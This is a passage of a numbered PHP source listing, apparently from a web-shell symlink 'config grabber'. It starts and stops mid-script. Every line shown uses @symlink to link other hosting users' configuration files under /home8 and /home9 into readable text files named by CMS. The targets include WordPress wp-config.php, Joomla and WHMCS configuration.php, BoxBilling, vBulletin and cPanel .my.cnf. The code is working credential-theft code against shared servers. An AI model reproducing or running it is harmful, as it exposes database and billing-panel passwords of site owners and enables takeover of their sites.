  2295. @symlink('/home8/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2296. @symlink('/home8/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2297. @symlink('/home8/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2298. @symlink('/home8/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2299. @symlink('/home8/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2300. @symlink('/home8/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2301. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2302. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2303. @symlink('/home8/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2304. @symlink('/home8/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2305. @symlink('/home8/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2306. @symlink('/home8/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2307. @symlink('/home8/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2308. @symlink('/home8/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2309. @symlink('/home8/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2310. @symlink('/home8/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2311. @symlink('/home8/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2312. @symlink('/home8/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2313. @symlink('/home8/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2314. @symlink('/home8/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2315. @symlink('/home8/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2316. @symlink('/home8/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2317. @symlink('/home8/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2318. @symlink('/home8/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2319. @symlink('/home8/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2320. @symlink('/home8/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2321. @symlink('/home8/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2322. @symlink('/home8/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2323. @symlink('/home8/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2324. @symlink('/home8/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2325. @symlink('/home8/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2326. @symlink('/home8/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2327. @symlink('/home8/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2328. @symlink('/home8/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2329. @symlink('/home8/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2330. @symlink('/home8/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2331. @symlink('/home8/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2332. @symlink('/home8/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2333. @symlink('/home8/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2334. @symlink('/home8/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2335. @symlink('/home8/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2336. @symlink('/home8/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2337. @symlink('/home8/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2338. @symlink('/home8/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2339. @symlink('/home8/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2340. @symlink('/home8/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2341. @symlink('/home8/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2342. @symlink('/home8/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2343. @symlink('/home8/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2344. @symlink('/home8/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2345. @symlink('/home8/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2346. @symlink('/home8/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2347. @symlink('/home8/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2348. @symlink('/home8/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2349. @symlink('/home8/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2350. @symlink('/home8/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2351. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2352. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2353. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2354. @symlink('/home8/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2355. @symlink('/home8/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2356. @symlink('/home8/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2357. @symlink('/home8/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2358. @symlink('/home8/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2359. @symlink('/home8/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2360. @symlink('/home8/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2361. @symlink('/home8/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2362. @symlink('/home8/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2363. @symlink('/home8/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2364. @symlink('/home8/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2365. @symlink('/home8/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2366. @symlink('/home8/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2367. @symlink('/home8/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2368. @symlink('/home8/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2369. @symlink('/home8/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2370. @symlink('/home8/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2371. @symlink('/home8/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2372. @symlink('/home8/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2373. @symlink('/home8/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home8/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2375. @symlink('/home8/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2376. @symlink('/home8/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2377. @symlink('/home8/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2378. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2379. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2380. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2381. @symlink('/home8/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2382. @symlink('/home8/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2383. @symlink('/home8/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2384. @symlink('/home8/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2385. @symlink('/home8/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2386. @symlink('/home8/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2387. @symlink('/home8/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2388. @symlink('/home8/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2389. @symlink('/home8/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2390. @symlink('/home8/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2391. @symlink('/home8/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2392. @symlink('/home8/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2393. @symlink('/home8/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2394. @symlink('/home8/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2395. @symlink('/home8/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2396. @symlink('/home8/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2397. @symlink('/home8/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2398. @symlink('/home8/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2399. @symlink('/home8/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2400. @symlink('/home8/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2401. @symlink('/home8/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2402. @symlink('/home8/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2403. @symlink('/home8/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2404. @symlink('/home8/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2405. @symlink('/home8/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2406. @symlink('/home8/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2407. @symlink('/home8/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2408. @symlink('/home8/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2409. @symlink('/home8/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2410. @symlink('/home8/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2411. @symlink('/home8/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2412. @symlink('/home8/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2413. @symlink('/home8/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2414. @symlink('/home8/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2415. @symlink('/home8/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2416. @symlink('/home8/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2417. @symlink('/home8/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2418. @symlink('/home8/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2419. @symlink('/home8/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2420. @symlink('/home8/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2421. @symlink('/home8/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2422. @symlink('/home8/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2423. @symlink('/home8/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2424. @symlink('/home8/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2425. @symlink('/home8/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2426. @symlink('/home8/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2427. @symlink('/home8/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2428. @symlink('/home8/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2429. @symlink('/home8/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2430. @symlink('/home8/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2431. @symlink('/home8/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2432. @symlink('/home8/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2433. @symlink('/home8/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2434.  
  2435. //home 9
  2436.  
  2437. @symlink('/home9/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2438. @symlink('/home9/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2439. @symlink('/home9/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2440. @symlink('/home9/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2441. @symlink('/home9/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2442. @symlink('/home9/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2443. @symlink('/home9/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2444. @symlink('/home9/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2445. @symlink('/home9/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2446. @symlink('/home9/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2447. @symlink('/home9/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2448. @symlink('/home9/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2449. @symlink('/home9/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2450. @symlink('/home9/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2451. @symlink('/home9/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2452. @symlink('/home9/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2453. @symlink('/home9/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2454. @symlink('/home9/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2455. @symlink('/home9/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2456. @symlink('/home9/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2457. @symlink('/home9/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2458. @symlink('/home9/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2459. @symlink('/home9/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2460. @symlink('/home9/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2461. @symlink('/home9/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2462. @symlink('/home9/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2463. @symlink('/home9/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2464. @symlink('/home9/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2465. @symlink('/home9/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2466. @symlink('/home9/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2467. @symlink('/home9/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2468. @symlink('/home9/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2469. @symlink('/home9/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2470. @symlink('/home9/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2471. @symlink('/home9/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2472. @symlink('/home9/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2473. @symlink('/home9/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2474. @symlink('/home9/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2475. @symlink('/home9/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2476. @symlink('/home9/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2477. @symlink('/home9/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2478. @symlink('/home9/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2479. @symlink('/home9/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2480. @symlink('/home9/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2481. @symlink('/home9/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2482. @symlink('/home9/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2483. @symlink('/home9/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2484. @symlink('/home9/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2485. @symlink('/home9/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2486. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2487. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2488. @symlink('/home9/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2489. @symlink('/home9/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2490. @symlink('/home9/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2491. @symlink('/home9/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2492. @symlink('/home9/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2493. @symlink('/home9/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2494. @symlink('/home9/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2495. @symlink('/home9/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2496. @symlink('/home9/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2497. @symlink('/home9/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2498. @symlink('/home9/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2499. @symlink('/home9/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2500. @symlink('/home9/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2501. @symlink('/home9/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2502. @symlink('/home9/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2503. @symlink('/home9/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2504. @symlink('/home9/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2505. @symlink('/home9/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2506. @symlink('/home9/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2507. @symlink('/home9/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2508. @symlink('/home9/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2509. @symlink('/home9/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2510. @symlink('/home9/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2511. @symlink('/home9/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2512. @symlink('/home9/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2513. @symlink('/home9/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2514. @symlink('/home9/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2515. @symlink('/home9/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2516. @symlink('/home9/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2517. @symlink('/home9/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2518. @symlink('/home9/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2519. @symlink('/home9/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2520. @symlink('/home9/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2521. @symlink('/home9/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2522. @symlink('/home9/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2523. @symlink('/home9/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2524. @symlink('/home9/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2525. @symlink('/home9/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2526. @symlink('/home9/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2527. @symlink('/home9/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2528. @symlink('/home9/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2529. @symlink('/home9/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2530. @symlink('/home9/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2531. @symlink('/home9/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2532. @symlink('/home9/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2533. @symlink('/home9/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2534. @symlink('/home9/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2535. @symlink('/home9/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2536. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2537. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2538. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2539. @symlink('/home9/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2540. @symlink('/home9/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2541. @symlink('/home9/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2542. @symlink('/home9/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2543. @symlink('/home9/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2544. @symlink('/home9/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2545. @symlink('/home9/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2546. @symlink('/home9/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2547. @symlink('/home9/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2548. @symlink('/home9/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2549. @symlink('/home9/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2550. @symlink('/home9/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2551. @symlink('/home9/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2552. @symlink('/home9/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2553. @symlink('/home9/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2554. @symlink('/home9/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2555. @symlink('/home9/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2556. @symlink('/home9/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home9/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home9/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home9/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2560. @symlink('/home9/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2561. @symlink('/home9/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2562. @symlink('/home9/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2563. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2564. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2565. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2566. @symlink('/home9/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2567. @symlink('/home9/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2568. @symlink('/home9/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2569. @symlink('/home9/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2570. @symlink('/home9/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2571. @symlink('/home9/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2572. @symlink('/home9/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2573. @symlink('/home9/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2574. @symlink('/home9/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2575. @symlink('/home9/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2576. @symlink('/home9/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2577. @symlink('/home9/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2578. @symlink('/home9/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2579. @symlink('/home9/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2580. @symlink('/home9/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2581. @symlink('/home9/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2582. @symlink('/home9/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2583. @symlink('/home9/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2584. @symlink('/home9/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2585. @symlink('/home9/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2586. @symlink('/home9/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2587. @symlink('/home9/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2588. @symlink('/home9/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2589. @symlink('/home9/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2590. @symlink('/home9/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2591. @symlink('/home9/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2592. @symlink('/home9/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2593. @symlink('/home9/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2594. @symlink('/home9/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2595. @symlink('/home9/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2596. @symlink('/home9/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2597. @symlink('/home9/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2598. @symlink('/home9/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2599. @symlink('/home9/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
